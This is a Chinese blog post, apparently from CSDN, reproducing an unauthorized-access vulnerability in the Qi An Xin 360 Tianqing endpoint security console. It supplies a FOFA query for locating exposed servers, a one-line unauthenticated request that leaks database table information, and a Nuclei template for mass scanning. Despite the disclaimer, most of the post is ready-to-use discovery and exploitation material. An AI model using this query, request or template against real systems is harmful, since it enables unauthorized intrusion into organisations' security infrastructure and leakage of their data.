• 漏洞复现--奇安信360天擎未授权访问


    免责声明:

    文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

    一:漏洞描述

    天擎基于奇安信全新的“川陀”终端安全平台构建,集成高性能病毒查杀、漏洞防护、主动防御引擎,深度融合威胁情报、大数据分析和安全可视化等创新技术,通过系统合规与加固、威胁防御与检测、运维管控与审计、终端数据防泄漏、统一管理与运营等功能,帮助政企客户构建持续有效的终端安全能力。该产品存在未授权访问,可造成数据库信息泄露。

    二:漏洞影响版本

    奇安信360天擎

    三:网络空间测绘查询

    fofa:
    banner="QiAnXin web server" || banner="360 web server" || body="appid\":\"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权,购买请联系4008-136-360"
    image.png

    四:漏洞复现

    image.png
    POC:

    GET /api/dbstat/gettablessize HTTP/1.1
    
    • 1

    image.png

    五:批量检测

    id: qianxin-360-tianqing-Unauthorized-access
    
    info:
      name: qianxin-360-tianqing-Unauthorized-access
      author: 芝士土拨鼠
      severity: Medium
      description: 360天擎官方版能够为用户精确检测已知病毒木马、未知恶意代码,有效防御APT攻击,360天擎存在未授权访问,可造成信息泄露
      metadata: 
        fofa-query: banner="QiAnXin web server" || banner="360 web server"  || body="appid\":\"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权,购买请联系4008-136-360"
        verified: true
        max-request: 1
    
    requests:
      - raw:
          - |+
            GET /api/dbstat/gettablessize HTTP/1.1
            Host: {{Hostname}}
            Cache-Control: max-age=0
            Sec-Ch-Ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"
            Sec-Ch-Ua-Mobile: ?0
            Sec-Ch-Ua-Platform: "Windows"
            Upgrade-Insecure-Requests: 1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: navigate
            Sec-Fetch-User: ?1
            Sec-Fetch-Dest: document
            Accept-Encoding: gzip, deflate
            Accept-Language: zh-CN,zh;q=0.9
            Connection: close
    
    
        matchers-condition: and
        matchers:
          - type: word
            part: body
            words:
              - success
          - type: status
            status:
              - 200
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41
    • 42

    image.png

  • 相关阅读:
    基于React的SSG静态站点渲染方案
    [杂记]关于C++中友元的一些理解
    【算法】【二叉树模块】求二叉树中最大搜索二叉子树,返回头结点
    全场景数实融合聚焦北京——2023(第六届)行业信息技术应用创新大会隆重召开
    埃夫特机器人更换编码器电池
    爱了爱了,20个好用到爆的 Python 函数
    activeMq将mqtt发布订阅转成消息队列
    Python第一次作业练习
    谨慎低调,一路通畅
    MYSQL----innoDB存储引擎
  • 原文地址:https://blog.csdn.net/qq_53003652/article/details/134328000